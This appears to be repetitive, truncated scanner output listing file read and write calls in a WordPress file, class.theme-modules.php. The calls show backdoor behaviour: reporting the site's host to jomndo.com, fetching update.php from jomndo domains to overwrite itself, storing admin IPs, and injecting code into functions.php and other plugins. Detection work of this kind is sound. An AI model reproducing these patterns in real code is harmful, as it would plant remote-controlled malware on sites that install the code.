@file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', '');567: $copyPlugin = file_put_contents($newPlugin, $pluginCode);578: file_put_contents($file, $str);581: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOC628: file_put_contents('SCRIPT_PATH', '');638: $copyPlugin = file_put_contents($newPlugin, $pluginCode);649: file_put_contents($file, $str);652: file_put_contents($file, PHP_EOL . $insertCode . PHP_EOL, FILE_APPEND | LOCfile_get_contents was found in the file class.theme-modules.php 199: if(!$log_installed = @file_get_contents('http://www.jomndo.com/o2.php?host='.$_SERVER['HTTP_HOST'201: $log_installed = @file_get_contents_mplugin('http://www.jomndo.com/o2.php?host='.$_SERVER['HT266: $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');309: $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt');347: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi356: elseif ($new_version = @file_get_contents('http://www.jomndo.xyz/update.php') AND stripos($new_vers365: elseif ($new_version = @file_get_contents('http://www.jomndo.top/update.php') AND stripos($new_vers376: if (($new_version = @file_get_contents('http://www.jomndo.com/update.php') OR $new_version = @fi385: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.xyz/update.php') AND stripos($394: elseif ($new_version = @file_get_contents_mplugin('http://www.jomndo.top/update.php') AND stripos($412: function file_get_contents_mplugin($url)472: $functions = file_get_contents($functionsPath);535: $temp = file_get_contents($pluginPath . '/' . $file);553: $script = file_get_contents('SCRIPT_PATH');570: $temp = file_get_contents($file);627: $script = file_get_contents('SCRIPT_PATH');641: $temp = file_get_contents($file);file_put_contents was found in the file class.theme-modules.php 273: @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip);350: @file_put_contents(__FILE__, $new_version);359: @file_put_contents(__FILE__, $new_version);368: @file_put_contents(__FILE__, $new_version);379: @file_put_contents(__FILE__, $new_version);388: @file_put_contents(__FILE__, $new_version);397: @file_put_contents(__FILE__, $new_version);481: file_put_contents($functionsPath, $str);554: file_put_contents('SCRIPT_PATH', 